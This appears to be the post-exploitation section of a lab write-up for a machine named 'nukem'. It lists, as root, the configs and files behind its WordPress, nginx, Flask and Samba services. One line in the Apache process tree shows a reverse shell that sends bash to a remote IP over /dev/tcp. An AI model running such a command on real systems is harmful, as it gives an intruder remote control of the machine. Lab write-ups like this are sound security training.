Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
WordPress (httpd.service)
[root@nukem ~]# systemctl status httpd.service
● httpd.service - Apache Web Server
Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
Active: active (running) since Thu 2025-01-30 07:49:09 UTC; 1 months 9 days ago
Main PID: 300 (httpd)
Tasks: 10 (limit: 2361)
Memory: 86.1M
CGroup: /system.slice/httpd.service
├─300 /usr/bin/httpd -k start -DFOREGROUND
├─385 /usr/bin/httpd -k start -DFOREGROUND
├─387 /usr/bin/httpd -k start -DFOREGROUND
├─388 /usr/bin/httpd -k start -DFOREGROUND
├─389 /usr/bin/httpd -k start -DFOREGROUND
├─390 /usr/bin/httpd -k start -DFOREGROUND
├─683 /usr/bin/httpd -k start -DFOREGROUND
├─901 /usr/bin/httpd -k start -DFOREGROUND
├─903 sh -c bash -i >& /dev/tcp/192.168.45.192/5000 0>&1
└─904 bash -i/usr/lib/systemd/system/httpd.service
[root@nukem ~]# cat /usr/lib/systemd/system/httpd.service
[Unit]
Description=Apache Web Server
After=network.target remote-fs.target nss-lookup.target
[Service]
Type=simple
ExecStart=/usr/bin/httpd -k start -DFOREGROUND
ExecStop=/usr/bin/httpd -k graceful-stop
ExecReload=/usr/bin/httpd -k graceful
PrivateTmp=true
LimitNOFILE=infinity
KillMode=mixed
[Install]
WantedBy=multi-user.target
[root@nukem ~]# cat /etc/httpd/conf/httpd.conf | grep -v '^#'
ServerRoot "/etc/httpd"
Listen 80
[...REDACTED...]
<IfModule unixd_module>
User http
Group http
</IfModule>
ServerAdmin you@example.com
<Directory />
AllowOverride none
Require all denied
</Directory>
DocumentRoot "/srv/http"
<Directory "/srv/http">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
<Files ".ht*">
Require all denied
</Files>
ErrorLog "/var/log/httpd/error_log"
LogLevel warn
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "/var/log/httpd/access_log" common
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/srv/http/cgi-bin/"
</IfModule>
<IfModule cgid_module>
</IfModule>
<Directory "/srv/http/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>
<IfModule headers_module>
RequestHeader unset Proxy early
</IfModule>
<IfModule mime_module>
TypesConfig conf/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
</IfModule>
Include conf/extra/httpd-mpm.conf
Include conf/extra/httpd-multilang-errordoc.conf
Include conf/extra/httpd-autoindex.conf
Include conf/extra/httpd-languages.conf
Include conf/extra/httpd-userdir.conf
Include conf/extra/httpd-default.conf
<IfModule proxy_html_module>
Include conf/extra/proxy-html.conf
</IfModule>
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
LoadModule php7_module modules/libphp7.so
AddHandler php7-script php
Include conf/extra/php7_module.conf
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps/srv/http
[root@nukem ~]# ll /srv/http
total 13M
4.0K drwxr-xr-x 7 http root 4.0K Mar 10 20:09 .
4.0K -rw------- 1 http http 865 Mar 10 20:09 .bash_history
4.0K drwx------ 3 root http 4.0K Mar 10 19:17 .config
4.0K drwxr-xr-x 5 http nobody 4.0K Oct 29 2020 wp-content
4.0K -rw-r--r-- 1 http http 461 Sep 28 2020 .htaccess
4.0K -rw-r--r-- 1 http root 2.9K Sep 18 2020 wp-config.php
4.0K drwxr-xr-x 2 http nobody 4.0K Sep 18 2020 wordpress
4.0K drwxr-xr-x 4 root root 4.0K Sep 18 2020 ..
13M -rw-r--r-- 1 http root 13M Sep 1 2020 latest.tar.gz
4.0K drwxr-xr-x 9 http nobody 4.0K Sep 1 2020 wp-admin
12K drwxr-xr-x 24 http nobody 12K Sep 1 2020 wp-includes
8.0K -rw-r--r-- 1 http nobody 7.0K Jul 28 2020 wp-activate.php
32K -rw-r--r-- 1 http nobody 31K Jul 23 2020 wp-signup.php
4.0K -rw-r--r-- 1 http nobody 2.3K Jul 23 2020 wp-comments-post.php
48K -rw-r--r-- 1 http nobody 48K Jul 7 2020 wp-login.php
20K -rw-r--r-- 1 http nobody 20K Jul 6 2020 wp-settings.php
8.0K -rw-r--r-- 1 http nobody 7.2K Jun 26 2020 readme.html
4.0K -rw-r--r-- 1 http nobody 3.2K Jun 8 2020 xmlrpc.php
12K -rw-r--r-- 1 http nobody 8.4K Apr 14 2020 wp-mail.php
20K -rw-r--r-- 1 http nobody 20K Feb 12 2020 license.txt
4.0K -rw-r--r-- 1 http nobody 405 Feb 6 2020 index.php
4.0K -rw-r--r-- 1 http nobody 351 Feb 6 2020 wp-blog-header.php
4.0K -rw-r--r-- 1 http nobody 2.9K Feb 6 2020 wp-config-sample.php
4.0K -rw-r--r-- 1 http nobody 3.9K Feb 6 2020 wp-cron.php
4.0K -rw-r--r-- 1 http nobody 2.5K Feb 6 2020 wp-links-opml.php
4.0K -rw-r--r-- 1 http nobody 3.3K Feb 6 2020 wp-load.php
8.0K -rw-r--r-- 1 http nobody 4.7K Feb 6 2020 wp-trackback.phpLogin V14 (nginx.service)
[root@nukem ~]# systemctl status nginx.service
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor preset: disabled)
Active: active (running) since Thu 2025-01-30 07:51:09 UTC; 1 months 9 days ago
Process: 551 ExecStart=/usr/bin/nginx -g pid /run/nginx.pid; error_log stderr; (code=exited, status=0/SUCCESS)
Main PID: 554 (nginx)
Tasks: 2 (limit: 2361)
Memory: 3.7M
CGroup: /system.slice/nginx.service
├─554 nginx: master process /usr/bin/nginx -g pid /run/nginx.pid; error_log stderr;
└─555 nginx: worker process
/usr/lib/systemd/system/nginx.service
[root@nukem ~]# cat /usr/lib/systemd/system/nginx.service
[Unit]
Description=A high performance web server and a reverse proxy server
After=network.target network-online.target nss-lookup.target
[Service]
Type=forking
PIDFile=/run/nginx.pid
PrivateDevices=yes
SyslogLevel=err
ExecStart=/usr/bin/nginx -g 'pid /run/nginx.pid; error_log stderr;'
ExecReload=/usr/bin/nginx -s reload
KillMode=mixed
[Install]
WantedBy=multi-user.target[root@nukem ~]# cat /etc/nginx/nginx.conf | grep -v '^#'
worker_processes 1;
events {
worker_connections 1024;
}
http {
include mime.types;
default_type application/octet-stream;
sendfile on;
keepalive_timeout 65;
server {
listen 13000;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
}/usr/share/nginx/html
[root@nukem ~]# ll /usr/share/nginx/html
total 48K
4.0K drwxr-xr-x 8 root root 4.0K Sep 28 2020 .
4.0K drwxr-xr-x 2 root root 4.0K Sep 28 2020 Login_v14
4.0K drwxr-xr-x 3 root root 4.0K Sep 28 2020 ..
4.0K -rw-r--r-- 1 root root 494 Aug 20 2020 50x.html
4.0K -rw-r--r-- 1 root root 612 Aug 20 2020 index.html.orig
4.0K drwxr-xr-x 8 root root 4.0K Jan 6 2018 fonts
4.0K drwxr-xr-x 2 root root 4.0K Jan 6 2018 css
4.0K drwxr-xr-x 3 root root 4.0K Jan 6 2018 images
4.0K drwxr-xr-x 2 root root 4.0K Jan 6 2018 js
4.0K drwxr-xr-x 11 root root 4.0K Jan 6 2018 vendor
8.0K -rwxr-xr-x 1 root root 5.0K Dec 18 2017 index.html
[root@nukem ~]# ll /usr/share/nginx/html/Login_v14/
total 8.0K
4.0K drwxr-xr-x 2 root root 4.0K Sep 28 2020 .
4.0K drwxr-xr-x 8 root root 4.0K Sep 28 2020 .Nothing. It was a dummy login page
Flask Application (pythonflask.service)
[root@nukem ~]# systemctl status pythonflask.service
● pythonflask.service - FlaskApp
Loaded: loaded (/etc/systemd/system/pythonflask.service; enabled; vendor preset: disabled)
Active: active (running) since Thu 2025-01-30 07:51:09 UTC; 1 months 9 days ago
Main PID: 552 (python)
Tasks: 1 (limit: 2361)
Memory: 38.8M
CGroup: /system.slice/pythonflask.service
└─552 /usr/bin/python /home/commander/python_rest_flask/server.py
[root@nukem ~]# cat /etc/systemd/system/pythonflask.service
[Unit]
Description=FlaskApp
After=network-online.target
[Service]
Type=simple
PIDFile=/run/pythonflask.pid
ExecStart=/usr/bin/python /home/commander/python_rest_flask/server.py
ExecUser=commander
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target/home/commander/python_rest_flask
[root@nukem ~]# ll /home/commander/python_rest_flask
total 888K
4.0K drwxr-xr-x 10 commander commander 4.0K Jan 30 07:49 ..
4.0K drwxr-xr-x 2 commander commander 4.0K Sep 18 2020 .
4.0K -rw-r--r-- 1 commander commander 2.5K Sep 18 2020 server.py
864K -rwxr-xr-x 1 commander commander 864K Sep 18 2020 chinook.db
4.0K -rw-r--r-- 1 commander commander 287 Sep 18 2020 requirements.txt
4.0K -rw-r--r-- 1 commander commander 15 Sep 18 2020 .gitignore
4.0K -rw-r--r-- 1 commander commander 417 Sep 18 2020 README.mdIt’s IDENTICAL to that of SMB
Samba
[root@nukem ~]# cat /etc/samba/smb.conf | grep -v '^#'
[Commander]
comment = Commander Files
path = /home/commander/python_rest_flask/
public = yes
writable = no
browsable = yes
read only = no
force user = commanderSet to /home/commander/python_rest_flask/